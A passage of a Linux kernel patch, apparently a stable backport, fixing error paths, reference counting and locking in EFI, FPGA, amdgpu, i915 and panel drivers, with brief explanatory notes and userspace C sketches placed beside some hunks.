+index 0a9aba5f9ceff..f178b2984dfb2 100644
+--- a/drivers/firmware/efi/memattr.c
++++ b/drivers/firmware/efi/memattr.c
+@@ -33,7 +33,7 @@ int __init efi_memattr_init(void)
+ 		return -ENOMEM;
+ 	}
+ 
+-	if (tbl->version > 1) {
++	if (tbl->version > 2) {
+ 		pr_warn("Unexpected EFI Memory Attributes table version %d\n",
+ 			tbl->version);
+ 		goto unmap;
+diff --git a/drivers/fpga/intel-m10-bmc-sec-update.c b/drivers/fpga/intel-m10-bmc-sec-update.c
+index 79d48852825ef..03f1bd81c434d 100644
+--- a/drivers/fpga/intel-m10-bmc-sec-update.c
++++ b/drivers/fpga/intel-m10-bmc-sec-update.c
+@@ -574,20 +574,27 @@ static int m10bmc_sec_probe(struct platform_device *pdev)
+ 	len = scnprintf(buf, SEC_UPDATE_LEN_MAX, "secure-update%d",
+ 			sec->fw_name_id);
+ 	sec->fw_name = kmemdup_nul(buf, len, GFP_KERNEL);
+-	if (!sec->fw_name)
+-		return -ENOMEM;
++	if (!sec->fw_name) {
++		ret = -ENOMEM;
++		goto fw_name_fail;
++	}
+ 
+ 	fwl = firmware_upload_register(THIS_MODULE, sec->dev, sec->fw_name,
+ 				       &m10bmc_ops, sec);
+ 	if (IS_ERR(fwl)) {
+ 		dev_err(sec->dev, "Firmware Upload driver failed to start\n");
+-		kfree(sec->fw_name);
+-		xa_erase(&fw_upload_xa, sec->fw_name_id);
+-		return PTR_ERR(fwl);
++		ret = PTR_ERR(fwl);
++		goto fw_uploader_fail;
+ 	}
+ 
+ 	sec->fwl = fwl;
+ 	return 0;
++
++fw_uploader_fail:
++	kfree(sec->fw_name);
++fw_name_fail:
++	xa_erase(&fw_upload_xa, sec->fw_name_id);
++	return ret;
+ }
+ 
+ static int m10bmc_sec_remove(struct platform_device *pdev)
+diff --git a/drivers/fpga/stratix10-soc.c b/drivers/fpga/stratix10-soc.c
+index 357cea58ec98e..f7f01982a5126 100644
+--- a/drivers/fpga/stratix10-soc.c
++++ b/drivers/fpga/stratix10-soc.c
+@@ -213,9 +213,9 @@ static int s10_ops_write_init(struct fpga_manager *mgr,
+ 	/* Allocate buffers from the service layer's pool. */
+ 	for (i = 0; i < NUM_SVC_BUFS; i++) {
+ 		kbuf = stratix10_svc_allocate_memory(priv->chan, SVC_BUF_SIZE);
+-		if (!kbuf) {
++		if (IS_ERR(kbuf)) {
+ 			s10_free_buffers(mgr);
+-			ret = -ENOMEM;
++			ret = PTR_ERR(kbuf);
+ 			goto init_done;
+ 		}
+ 
+diff --git a/drivers/fsi/fsi-sbefifo.c b/drivers/fsi/fsi-sbefifo.c
+index 5f93a53846aad..9912b7a6a4b9a 100644
+--- a/drivers/fsi/fsi-sbefifo.c
++++ b/drivers/fsi/fsi-sbefifo.c
+@@ -659,7 +659,7 @@ static void sbefifo_collect_async_ffdc(struct sbefifo *sbefifo)
+ 	}
+         ffdc_iov.iov_base = ffdc;
+ 	ffdc_iov.iov_len = SBEFIFO_MAX_FFDC_SIZE;
+-        iov_iter_kvec(&ffdc_iter, WRITE, &ffdc_iov, 1, SBEFIFO_MAX_FFDC_SIZE);
++        iov_iter_kvec(&ffdc_iter, ITER_DEST, &ffdc_iov, 1, SBEFIFO_MAX_FFDC_SIZE);
+ 	cmd[0] = cpu_to_be32(2);
+ 	cmd[1] = cpu_to_be32(SBEFIFO_CMD_GET_SBE_FFDC);
+ 	rc = sbefifo_do_command(sbefifo, cmd, 2, &ffdc_iter);
+@@ -756,7 +756,7 @@ int sbefifo_submit(struct device *dev, const __be32 *command, size_t cmd_len,
+ 	rbytes = (*resp_len) * sizeof(__be32);
+ 	resp_iov.iov_base = response;
+ 	resp_iov.iov_len = rbytes;
+-        iov_iter_kvec(&resp_iter, WRITE, &resp_iov, 1, rbytes);
++        iov_iter_kvec(&resp_iter, ITER_DEST, &resp_iov, 1, rbytes);
+ 
+ 	/* Perform the command */
+ 	rc = mutex_lock_interruptible(&sbefifo->lock);
+@@ -839,7 +839,7 @@ static ssize_t sbefifo_user_read(struct file *file, char __user *buf,
+ 	/* Prepare iov iterator */
+ 	resp_iov.iov_base = buf;
+ 	resp_iov.iov_len = len;
+-	iov_iter_init(&resp_iter, WRITE, &resp_iov, 1, len);
++	iov_iter_init(&resp_iter, ITER_DEST, &resp_iov, 1, len);
+ 
+ 	/* Perform the command */
+ 	rc = mutex_lock_interruptible(&sbefifo->lock);
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 3bf4f2edc1089..90e739d9aeee7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -790,8 +790,8 @@ static void gfx_v11_0_read_wave_data(struct amdgpu_device *adev, uint32_t simd,
+ 	 * zero here */
+ 	WARN_ON(simd != 0);
+ 
+-	/* type 2 wave data */
+-	dst[(*no_fields)++] = 2;
++	/* type 3 wave data */
++	dst[(*no_fields)++] = 3;
+ 	dst[(*no_fields)++] = wave_read_ind(adev, wave, ixSQ_WAVE_STATUS);
+ 	dst[(*no_fields)++] = wave_read_ind(adev, wave, ixSQ_WAVE_PC_LO);
+ 	dst[(*no_fields)++] = wave_read_ind(adev, wave, ixSQ_WAVE_PC_HI);
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c b/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c
+index 15eb3658d70e6..09fdcd20cb919 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c
+@@ -337,7 +337,13 @@ const struct nbio_hdp_flush_reg nbio_v4_3_hdp_flush_reg = {
+ 
+ static void nbio_v4_3_init_registers(struct amdgpu_device *adev)
+ {
+-	return;
++	if (adev->ip_versions[NBIO_HWIP][0] == IP_VERSION(4, 3, 0)) {
++		uint32_t data;
++
++		data = RREG32_SOC15(NBIO, 0, regRCC_DEV0_EPF2_STRAP2);
++		data &= ~RCC_DEV0_EPF2_STRAP2__STRAP_NO_SOFT_RESET_DEV0_F2_MASK;
++		WREG32_SOC15(NBIO, 0, regRCC_DEV0_EPF2_STRAP2, data);
++	}
+ }
+ 
+ static u32 nbio_v4_3_get_rom_offset(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 85bd1f18259c7..b425ec00817c4 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -8784,6 +8784,13 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 		if (!dm_old_crtc_state->stream)
+ 			goto skip_modeset;
+ 
++		/* Unset freesync video if it was active before */
++		if (dm_old_crtc_state->freesync_config.state == VRR_STATE_ACTIVE_FIXED) {
++			dm_new_crtc_state->freesync_config.state = VRR_STATE_INACTIVE;
++			dm_new_crtc_state->freesync_config.fixed_refresh_in_uhz = 0;
++		}
++
++		/* Now check if we should set freesync video mode */
+ 		if (amdgpu_freesync_vid_mode && dm_new_crtc_state->stream &&
+ 		    is_timing_unchanged_for_freesync(new_crtc_state,
+ 						     old_crtc_state)) {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 2875f6bc3a6a2..ed36088ebcfde 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -1498,6 +1498,20 @@ static int smu_disable_dpms(struct smu_context *smu)
+ 		}
+ 	}
+ 
++	/*
++	 * For SMU 13.0.4/11, PMFW will handle feature disablement properly
++	 * for the gpu reset case. Driver involvement is unnecessary.
++	 */
++	if (amdgpu_in_reset(adev)) {
++		switch (adev->ip_versions[MP1_HWIP][0]) {
++		case IP_VERSION(13, 0, 4):
++		case IP_VERSION(13, 0, 11):
++			return 0;
++		default:
++			break;
++		}
++	}
++
+ 	/*
+ 	 * For gpu reset, runpm and hibernation through BACO,
+ 	 * BACO feature has to be kept enabled.
+diff --git a/drivers/gpu/drm/i915/display/intel_cdclk.c b/drivers/gpu/drm/i915/display/intel_cdclk.c
+index ed05070b73072..92925f0f72396 100644
+--- a/drivers/gpu/drm/i915/display/intel_cdclk.c
++++ b/drivers/gpu/drm/i915/display/intel_cdclk.c
+@@ -1323,7 +1323,7 @@ static const struct intel_cdclk_vals adlp_cdclk_table[] = {
+ 	{ .refclk = 24000, .cdclk = 192000, .divider = 2, .ratio = 16 },
+ 	{ .refclk = 24000, .cdclk = 312000, .divider = 2, .ratio = 26 },
+ 	{ .refclk = 24000, .cdclk = 552000, .divider = 2, .ratio = 46 },
+-	{ .refclk = 24400, .cdclk = 648000, .divider = 2, .ratio = 54 },
++	{ .refclk = 24000, .cdclk = 648000, .divider = 2, .ratio = 54 },
+ 
+ 	{ .refclk = 38400, .cdclk = 179200, .divider = 3, .ratio = 14 },
+ 	{ .refclk = 38400, .cdclk = 192000, .divider = 2, .ratio = 10 },
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_context.c b/drivers/gpu/drm/i915/gem/i915_gem_context.c
+index 2353723ca1bd2..598028870124d 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_context.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_context.c
+@@ -1861,11 +1861,19 @@ static int get_ppgtt(struct drm_i915_file_private *file_priv,
+ 	vm = ctx->vm;
+ 	GEM_BUG_ON(!vm);
+ 
++	/*
++	 * Get a reference for the allocated handle.  Once the handle is
++	 * visible in the vm_xa table, userspace could try to close it
++	 * from under our feet, so we need to hold the extra reference
++	 * first.
++	 */
++	i915_vm_get(vm);
++
+ 	err = xa_alloc(&file_priv->vm_xa, &id, vm, xa_limit_32b, GFP_KERNEL);
+-	if (err)
++	if (err) {
++		i915_vm_put(vm);
+ 		return err;
+-
+-	i915_vm_get(vm);
++	}
+ 
+ 	GEM_BUG_ON(id == 0); /* reserved for invalid/unassigned ppgtt */
+ 	args->value = id;
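The reordering above is the take-a-reference-before-publishing pattern: once xa_alloc() makes the vm visible under an id, a racing close can drop the reference the creator has not yet taken. Here is a reduced, single-threaded sketch of the invariant; the refcount and one-slot table are stand-ins, not the i915 structures.

/* Sketch: take a reference before the object becomes findable. */
#include <stdatomic.h>
#include <stdio.h>

struct obj { atomic_int ref; };

static void obj_get(struct obj *o) { atomic_fetch_add(&o->ref, 1); }

static void obj_put(struct obj *o)
{
	if (atomic_fetch_sub(&o->ref, 1) == 1)
		printf("last reference dropped: object freed\n");
}

static struct obj *table[1];	/* stand-in for the vm_xa xarray */

static void publish(struct obj *o)
{
	/* Take the reference FIRST: the moment the object is visible in
	 * the table, another thread can look it up, close the handle and
	 * drop what it believes is the last reference. */
	obj_get(o);
	table[0] = o;		/* xa_alloc() in the original */
}

int main(void)
{
	struct obj o = { .ref = 1 };

	publish(&o);
	table[0] = NULL;	/* a racing close: unpublish... */
	obj_put(&o);		/* ...and drop the table's reference */
	printf("creator's reference survives, refcount=%d\n",
	       atomic_load(&o.ref));
	return 0;
}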
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_tiling.c b/drivers/gpu/drm/i915/gem/i915_gem_tiling.c
+index fd42b89b7162b..bc21b1c2350a7 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_tiling.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_tiling.c
+@@ -305,10 +305,6 @@ i915_gem_object_set_tiling(struct drm_i915_gem_object *obj,
+ 	spin_unlock(&obj->vma.lock);
+ 
+ 	obj->tiling_and_stride = tiling | stride;
+-	i915_gem_object_unlock(obj);
+-
+-	/* Force the fence to be reacquired for GTT access */
+-	i915_gem_object_release_mmap_gtt(obj);
+ 
+ 	/* Try to preallocate memory required to save swizzling on put-pages */
+ 	if (i915_gem_object_needs_bit17_swizzle(obj)) {
+@@ -321,6 +317,11 @@ i915_gem_object_set_tiling(struct drm_i915_gem_object *obj,
+ 		obj->bit_17 = NULL;
+ 	}
+ 
++	i915_gem_object_unlock(obj);
++
++	/* Force the fence to be reacquired for GTT access */
++	i915_gem_object_release_mmap_gtt(obj);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_context.c b/drivers/gpu/drm/i915/gt/intel_context.c
+index e94365b08f1ef..2aa63ec521b89 100644
+--- a/drivers/gpu/drm/i915/gt/intel_context.c
++++ b/drivers/gpu/drm/i915/gt/intel_context.c
+@@ -528,7 +528,7 @@ retry:
+ 	return rq;
+ }
+ 
+-struct i915_request *intel_context_find_active_request(struct intel_context *ce)
++struct i915_request *intel_context_get_active_request(struct intel_context *ce)
+ {
+ 	struct intel_context *parent = intel_context_to_parent(ce);
+ 	struct i915_request *rq, *active = NULL;
+@@ -552,6 +552,8 @@ struct i915_request *intel_context_find_active_request(struct intel_context *ce)
+ 
+ 		active = rq;
+ 	}
++	if (active)
++		active = i915_request_get_rcu(active);
+ 	spin_unlock_irqrestore(&parent->guc_state.lock, flags);
+ 
+ 	return active;
+diff --git a/drivers/gpu/drm/i915/gt/intel_context.h b/drivers/gpu/drm/i915/gt/intel_context.h
+index be09fb2e883a5..4ab6c8ddd6ecc 100644
+--- a/drivers/gpu/drm/i915/gt/intel_context.h
++++ b/drivers/gpu/drm/i915/gt/intel_context.h
+@@ -268,8 +268,7 @@ int intel_context_prepare_remote_request(struct intel_context *ce,
+ 
+ struct i915_request *intel_context_create_request(struct intel_context *ce);
+ 
+-struct i915_request *
+-intel_context_find_active_request(struct intel_context *ce);
++struct i915_request *intel_context_get_active_request(struct intel_context *ce);
+ 
+ static inline bool intel_context_is_barrier(const struct intel_context *ce)
+ {
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine.h b/drivers/gpu/drm/i915/gt/intel_engine.h
+index cbc8b857d5f7a..7a4504ea35c36 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine.h
++++ b/drivers/gpu/drm/i915/gt/intel_engine.h
+@@ -248,8 +248,8 @@ void intel_engine_dump_active_requests(struct list_head *requests,
+ ktime_t intel_engine_get_busy_time(struct intel_engine_cs *engine,
+ 				   ktime_t *now);
+ 
+-struct i915_request *
+-intel_engine_execlist_find_hung_request(struct intel_engine_cs *engine);
++void intel_engine_get_hung_entity(struct intel_engine_cs *engine,
++				  struct intel_context **ce, struct i915_request **rq);
+ 
+ u32 intel_engine_context_size(struct intel_gt *gt, u8 class);
+ struct intel_context *
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_cs.c b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+index fcbccd8d244e9..b458547e1fc6e 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+@@ -2078,17 +2078,6 @@ static void print_request_ring(struct drm_printer *m, struct i915_request *rq)
+ 	}
+ }
+ 
+-static unsigned long list_count(struct list_head *list)
+-{
+-	struct list_head *pos;
+-	unsigned long count = 0;
+-
+-	list_for_each(pos, list)
+-		count++;
+-
+-	return count;
+-}
+-
+ static unsigned long read_ul(void *p, size_t x)
+ {
+ 	return *(unsigned long *)(p + x);
+@@ -2180,11 +2169,11 @@ void intel_engine_dump_active_requests(struct list_head *requests,
+ 	}
+ }
+ 
+-static void engine_dump_active_requests(struct intel_engine_cs *engine, struct drm_printer *m)
++static void engine_dump_active_requests(struct intel_engine_cs *engine,
++					struct drm_printer *m)
+ {
++	struct intel_context *hung_ce = NULL;
+ 	struct i915_request *hung_rq = NULL;
+-	struct intel_context *ce;
+-	bool guc;
+ 
+ 	/*
+ 	 * No need for an engine->irq_seqno_barrier() before the seqno reads.
+@@ -2193,27 +2182,22 @@ static void engine_dump_active_requests(struct intel_engine_cs *engine, struct d
+ 	 * But the intention here is just to report an instantaneous snapshot
+ 	 * so that's fine.
+ 	 */
+-	lockdep_assert_held(&engine->sched_engine->lock);
++	intel_engine_get_hung_entity(engine, &hung_ce, &hung_rq);
+ 
+ 	drm_printf(m, "\tRequests:\n");
+ 
+-	guc = intel_uc_uses_guc_submission(&engine->gt->uc);
+-	if (guc) {
+-		ce = intel_engine_get_hung_context(engine);
+-		if (ce)
+-			hung_rq = intel_context_find_active_request(ce);
+-	} else {
+-		hung_rq = intel_engine_execlist_find_hung_request(engine);
+-	}
+-
+ 	if (hung_rq)
+ 		engine_dump_request(hung_rq, m, "\t\thung");
++	else if (hung_ce)
++		drm_printf(m, "\t\tGot hung ce but no hung rq!\n");
+ 
+-	if (guc)
++	if (intel_uc_uses_guc_submission(&engine->gt->uc))
+ 		intel_guc_dump_active_requests(engine, hung_rq, m);
+ 	else
+-		intel_engine_dump_active_requests(&engine->sched_engine->requests,
+-						  hung_rq, m);
++		intel_execlists_dump_active_requests(engine, hung_rq, m);
++
++	if (hung_rq)
++		i915_request_put(hung_rq);
+ }
+ 
+ void intel_engine_dump(struct intel_engine_cs *engine,
+@@ -2223,7 +2207,6 @@ void intel_engine_dump(struct intel_engine_cs *engine,
+ 	struct i915_gpu_error * const error = &engine->i915->gpu_error;
+ 	struct i915_request *rq;
+ 	intel_wakeref_t wakeref;
+-	unsigned long flags;
+ 	ktime_t dummy;
+ 
+ 	if (header) {
+@@ -2260,13 +2243,8 @@ void intel_engine_dump(struct intel_engine_cs *engine,
+ 		   i915_reset_count(error));
+ 	print_properties(engine, m);
+ 
+-	spin_lock_irqsave(&engine->sched_engine->lock, flags);
+ 	engine_dump_active_requests(engine, m);
+ 
+-	drm_printf(m, "\tOn hold?: %lu\n",
+-		   list_count(&engine->sched_engine->hold));
+-	spin_unlock_irqrestore(&engine->sched_engine->lock, flags);
+-
+ 	drm_printf(m, "\tMMIO base:  0x%08x\n", engine->mmio_base);
+ 	wakeref = intel_runtime_pm_get_if_in_use(engine->uncore->rpm);
+ 	if (wakeref) {
+@@ -2312,8 +2290,7 @@ intel_engine_create_virtual(struct intel_engine_cs **siblings,
+ 	return siblings[0]->cops->create_virtual(siblings, count, flags);
+ }
+ 
+-struct i915_request *
+-intel_engine_execlist_find_hung_request(struct intel_engine_cs *engine)
++static struct i915_request *engine_execlist_find_hung_request(struct intel_engine_cs *engine)
+ {
+ 	struct i915_request *request, *active = NULL;
+ 
+@@ -2365,6 +2342,33 @@ intel_engine_execlist_find_hung_request(struct intel_engine_cs *engine)
+ 	return active;
+ }
+ 
++void intel_engine_get_hung_entity(struct intel_engine_cs *engine,
++				  struct intel_context **ce, struct i915_request **rq)
++{
++	unsigned long flags;
++
++	*ce = intel_engine_get_hung_context(engine);
++	if (*ce) {
++		intel_engine_clear_hung_context(engine);
++
++		*rq = intel_context_get_active_request(*ce);
++		return;
++	}
++
++	/*
++	 * Getting here with GuC enabled means it is a forced error capture
++	 * with no actual hang. So, no need to attempt the execlist search.
++	 */
++	if (intel_uc_uses_guc_submission(&engine->gt->uc))
++		return;
++
++	spin_lock_irqsave(&engine->sched_engine->lock, flags);
++	*rq = engine_execlist_find_hung_request(engine);
++	if (*rq)
++		*rq = i915_request_get_rcu(*rq);
++	spin_unlock_irqrestore(&engine->sched_engine->lock, flags);
++}
++
+ void xehp_enable_ccs_engines(struct intel_engine_cs *engine)
+ {
+ 	/*
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index c718e6dc40b51..bfd1ffc71a489 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -4144,6 +4144,33 @@ void intel_execlists_show_requests(struct intel_engine_cs *engine,
+ 	spin_unlock_irqrestore(&sched_engine->lock, flags);
+ }
+ 
++static unsigned long list_count(struct list_head *list)
++{
++	struct list_head *pos;
++	unsigned long count = 0;
++
++	list_for_each(pos, list)
++		count++;
++
++	return count;
++}
++
++void intel_execlists_dump_active_requests(struct intel_engine_cs *engine,
++					  struct i915_request *hung_rq,
++					  struct drm_printer *m)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&engine->sched_engine->lock, flags);
++
++	intel_engine_dump_active_requests(&engine->sched_engine->requests, hung_rq, m);
++
++	drm_printf(m, "\tOn hold?: %lu\n",
++		   list_count(&engine->sched_engine->hold));
++
++	spin_unlock_irqrestore(&engine->sched_engine->lock, flags);
++}
++
+ #if IS_ENABLED(CONFIG_DRM_I915_SELFTEST)
+ #include "selftest_execlists.c"
+ #endif
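list_count() moved here verbatim because its only remaining caller is the execlists-specific dump; nothing about it is engine-generic. For reference, a self-contained sketch of the same O(n) walk over an intrusive circular list, with list_head re-implemented in userspace:

/* Minimal userspace re-implementation of the kernel's intrusive list. */
#include <stdio.h>

struct list_head { struct list_head *next, *prev; };

static void list_init(struct list_head *h) { h->next = h->prev = h; }

static void list_add_tail(struct list_head *n, struct list_head *h)
{
	n->prev = h->prev;
	n->next = h;
	h->prev->next = n;
	h->prev = n;
}

static unsigned long list_count(struct list_head *list)
{
	struct list_head *pos;
	unsigned long count = 0;

	/* the head is a sentinel, so start at ->next and stop at it */
	for (pos = list->next; pos != list; pos = pos->next)
		count++;
	return count;
}

int main(void)
{
	struct list_head hold, a, b;

	list_init(&hold);
	list_add_tail(&a, &hold);
	list_add_tail(&b, &hold);
	printf("On hold?: %lu\n", list_count(&hold));
	return 0;
}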
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.h b/drivers/gpu/drm/i915/gt/intel_execlists_submission.h
+index a1aa92c983a51..d2c7d45ea0623 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.h
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.h
+@@ -32,6 +32,10 @@ void intel_execlists_show_requests(struct intel_engine_cs *engine,
+ 							int indent),
+ 				   unsigned int max);
+ 
++void intel_execlists_dump_active_requests(struct intel_engine_cs *engine,
++					  struct i915_request *hung_rq,
++					  struct drm_printer *m);
++
+ bool
+ intel_engine_in_execlists_submission_mode(const struct intel_engine_cs *engine);
+ 
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+index 1a23e901cc663..0ec07dad1dcf1 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+@@ -1685,7 +1685,7 @@ static void __guc_reset_context(struct intel_context *ce, intel_engine_mask_t st
+ 			goto next_context;
+ 
+ 		guilty = false;
+-		rq = intel_context_find_active_request(ce);
++		rq = intel_context_get_active_request(ce);
+ 		if (!rq) {
+ 			head = ce->ring->tail;
+ 			goto out_replay;
+@@ -1698,6 +1698,7 @@ static void __guc_reset_context(struct intel_context *ce, intel_engine_mask_t st
+ 		head = intel_ring_wrap(ce->ring, rq->head);
+ 
+ 		__i915_request_reset(rq, guilty);
++		i915_request_put(rq);
+ out_replay:
+ 		guc_reset_state(ce, head, guilty);
+ next_context:
+@@ -4587,6 +4588,8 @@ void intel_guc_find_hung_context(struct intel_engine_cs *engine)
+ 
+ 	xa_lock_irqsave(&guc->context_lookup, flags);
+ 	xa_for_each(&guc->context_lookup, index, ce) {
++		bool found;
++
+ 		if (!kref_get_unless_zero(&ce->ref))
+ 			continue;
+ 
+@@ -4603,10 +4606,18 @@ void intel_guc_find_hung_context(struct intel_engine_cs *engine)
+ 				goto next;
+ 		}
+ 
++		found = false;
++		spin_lock(&ce->guc_state.lock);
+ 		list_for_each_entry(rq, &ce->guc_state.requests, sched.link) {
+ 			if (i915_test_request_state(rq) != I915_REQUEST_ACTIVE)
+ 				continue;
+ 
++			found = true;
++			break;
++		}
++		spin_unlock(&ce->guc_state.lock);
++
++		if (found) {
+ 			intel_engine_set_hung_context(engine, ce);
+ 
+ 			/* Can only cope with one hang at a time... */
+@@ -4614,6 +4625,7 @@ void intel_guc_find_hung_context(struct intel_engine_cs *engine)
+ 			xa_lock(&guc->context_lookup);
+ 			goto done;
+ 		}
++
+ next:
+ 		intel_context_put(ce);
+ 		xa_lock(&guc->context_lookup);
+diff --git a/drivers/gpu/drm/i915/i915_gpu_error.c b/drivers/gpu/drm/i915/i915_gpu_error.c
+index 9ea2fe34e7d30..847b9e6af1a1d 100644
+--- a/drivers/gpu/drm/i915/i915_gpu_error.c
++++ b/drivers/gpu/drm/i915/i915_gpu_error.c
+@@ -1592,43 +1592,20 @@ capture_engine(struct intel_engine_cs *engine,
+ {
+ 	struct intel_engine_capture_vma *capture = NULL;
+ 	struct intel_engine_coredump *ee;
+-	struct intel_context *ce;
++	struct intel_context *ce = NULL;
+ 	struct i915_request *rq = NULL;
+-	unsigned long flags;
+ 
+ 	ee = intel_engine_coredump_alloc(engine, ALLOW_FAIL, dump_flags);
+ 	if (!ee)
+ 		return NULL;
+ 
+-	ce = intel_engine_get_hung_context(engine);
+-	if (ce) {
+-		intel_engine_clear_hung_context(engine);
+-		rq = intel_context_find_active_request(ce);
+-		if (!rq || !i915_request_started(rq))
+-			goto no_request_capture;
+-	} else {
+-		/*
+-		 * Getting here with GuC enabled means it is a forced error capture
+-		 * with no actual hang. So, no need to attempt the execlist search.
+-		 */
+-		if (!intel_uc_uses_guc_submission(&engine->gt->uc)) {
+-			spin_lock_irqsave(&engine->sched_engine->lock, flags);
+-			rq = intel_engine_execlist_find_hung_request(engine);
+-			spin_unlock_irqrestore(&engine->sched_engine->lock,
+-					       flags);
+-		}
+-	}
+-	if (rq)
+-		rq = i915_request_get_rcu(rq);
+-
+-	if (!rq)
++	intel_engine_get_hung_entity(engine, &ce, &rq);
++	if (!rq || !i915_request_started(rq))
+ 		goto no_request_capture;
+ 
+ 	capture = intel_engine_coredump_add_request(ee, rq, ATOMIC_MAYFAIL);
+-	if (!capture) {
+-		i915_request_put(rq);
++	if (!capture)
+ 		goto no_request_capture;
+-	}
+ 	if (dump_flags & CORE_DUMP_FLAG_IS_GUC_CAPTURE)
+ 		intel_guc_capture_get_matching_node(engine->gt, ee, ce);
+ 
+@@ -1638,6 +1615,8 @@ capture_engine(struct intel_engine_cs *engine,
+ 	return ee;
+ 
+ no_request_capture:
++	if (rq)
++		i915_request_put(rq);
+ 	kfree(ee);
+ 	return NULL;
+ }
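capture_engine() now funnels every failure through one label, releasing the request reference only if one was actually taken. A compact sketch of this single-exit cleanup style, with all names invented:

/* Sketch of goto-based unwind: release each resource iff acquired. */
#include <stdio.h>
#include <stdlib.h>

struct req { int refs; };

static void req_put(struct req *rq) { rq->refs--; }

static void *do_capture(int fail_later, struct req *maybe_rq)
{
	void *ee = malloc(32);
	struct req *rq = NULL;

	if (!ee)
		return NULL;

	if (maybe_rq) {		/* may legitimately come back NULL */
		rq = maybe_rq;
		rq->refs++;	/* reference taken here... */
	}
	if (!rq || fail_later)
		goto no_request_capture;

	return ee;		/* success: caller owns ee and rq */

no_request_capture:
	if (rq)			/* ...so it is dropped on every exit path */
		req_put(rq);
	free(ee);
	return NULL;
}

int main(void)
{
	struct req rq = { .refs = 1 };

	if (!do_capture(1, &rq))
		printf("capture failed, refs back to %d\n", rq.refs);
	return 0;
}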
+diff --git a/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c b/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
+index 857a2f0420d77..c924f1124ebca 100644
+--- a/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
++++ b/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
+@@ -1193,14 +1193,11 @@ static int boe_panel_enter_sleep_mode(struct boe_panel *boe)
+ 	return 0;
+ }
+ 
+-static int boe_panel_unprepare(struct drm_panel *panel)
++static int boe_panel_disable(struct drm_panel *panel)
+ {
+ 	struct boe_panel *boe = to_boe_panel(panel);
+ 	int ret;
+ 
+-	if (!boe->prepared)
+-		return 0;
+-
+ 	ret = boe_panel_enter_sleep_mode(boe);
+ 	if (ret < 0) {
+ 		dev_err(panel->dev, "failed to set panel off: %d\n", ret);
+@@ -1209,6 +1206,16 @@ static int boe_panel_unprepare(struct drm_panel *panel)
+ 
+ 	msleep(150);
+ 
++	return 0;
++}
++
++static int boe_panel_unprepare(struct drm_panel *panel)
++{
++	struct boe_panel *boe = to_boe_panel(panel);
++
++	if (!boe->prepared)
++		return 0;
++
+ 	if (boe->desc->discharge_on_disable) {
+ 		regulator_disable(boe->avee);
+ 		regulator_disable(boe->avdd);
+@@ -1528,6 +1535,7 @@ static enum drm_panel_orientation boe_panel_get_orientation(struct drm_panel *pa
+ }
+ 
+ static const struct drm_panel_funcs boe_panel_funcs = {
++	.disable = boe_panel_disable,
+ 	.unprepare = boe_panel_unprepare,
+ 	.prepare = boe_panel_prepare,
+ 	.enable = boe_panel_enable,
+diff --git a/drivers/gpu/drm/solomon/ssd130x.c b/drivers/gpu/drm/solomon/ssd130x.c
+index bc41a5ae810af..4bb3a247732dc 100644
+--- a/drivers/gpu/drm/solomon/ssd130x.c
++++ b/drivers/gpu/drm/solomon/ssd130x.c
+@@ -665,18 +665,8 @@ static const struct drm_crtc_helper_funcs ssd130x_crtc_helper_funcs = {
+ 	.atomic_check = ssd130x_crtc_helper_atomic_check,
+ };
+ 
+-static void ssd130x_crtc_reset(struct drm_crtc *crtc)
+-{
+-	struct drm_device *drm = crtc->dev;
+-	struct ssd130x_device *ssd130x = drm_to_ssd130x(drm);
+-
+-	ssd130x_init(ssd130x);
+-
+-	drm_atomic_helper_crtc_reset(crtc);
+-}
+-
